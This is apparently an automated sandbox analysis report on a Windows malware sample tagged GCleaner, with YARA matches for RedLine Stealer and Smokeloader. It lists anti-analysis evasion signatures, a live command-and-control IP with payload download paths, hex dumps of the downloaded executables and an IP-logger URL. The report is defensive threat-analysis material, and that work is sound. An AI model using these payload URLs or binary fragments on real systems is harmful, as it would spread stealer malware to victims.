Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3K6rBUOQ2z.exe

Overview

General Information

Sample name:3K6rBUOQ2z.exe
renamed because original name is a hash value
Original sample name:cd064ed63eb478d56c93d52cfe887dc8.exe
Analysis ID:1578960
MD5:cd064ed63eb478d56c93d52cfe887dc8
SHA1:9d62f688f68fcd6e26dd305182aaa06b347cac19
SHA256:a324acc96508f28104aa5405783170e94920f75a4f07751583b97e18bb98deb2
Tags:exeGCleaneruser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 3K6rBUOQ2z.exe (PID: 4204 cmdline: "C:\Users\user\Desktop\3K6rBUOQ2z.exe" MD5: CD064ED63EB478D56C93D52CFE887DC8)
    • WerFault.exe (PID: 5108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1548 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1430:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 3K6rBUOQ2z.exeAvira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exeReversingLabs: Detection: 75%
Source: 3K6rBUOQ2z.exeReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exeJoe Sandbox ML: detected
Source: 3K6rBUOQ2z.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004034C0
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B43727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04B43727
Source: 3K6rBUOQ2z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B55F6E FindFirstFileExW,0_2_04B55F6E
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 16:09:59 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 16:10:02 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 185.156.73.23 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp8
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadX
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadp
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/keyW
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download23/files/downloadz
Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
Source: 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.00000000057DE000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357895485.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358451086.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357936913.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.000000000581B000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358268581.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2360335991.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2359822442.000000000581F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.00000000057DE000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357895485.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358451086.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357936913.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.000000000581B000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358268581.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2360335991.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2359822442.000000000581F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.00000000057DE000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357895485.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358451086.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2357936913.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358075717.000000000581B000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2358268581.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2360335991.000000000581F000.00000004.00000020.00020000.00000000.sdmp, 3K6rBUOQ2z.exe, 00000000.00000003.2359822442.000000000581F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Source: 00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 3K6rBUOQ2z.exeStatic PE information: section name:
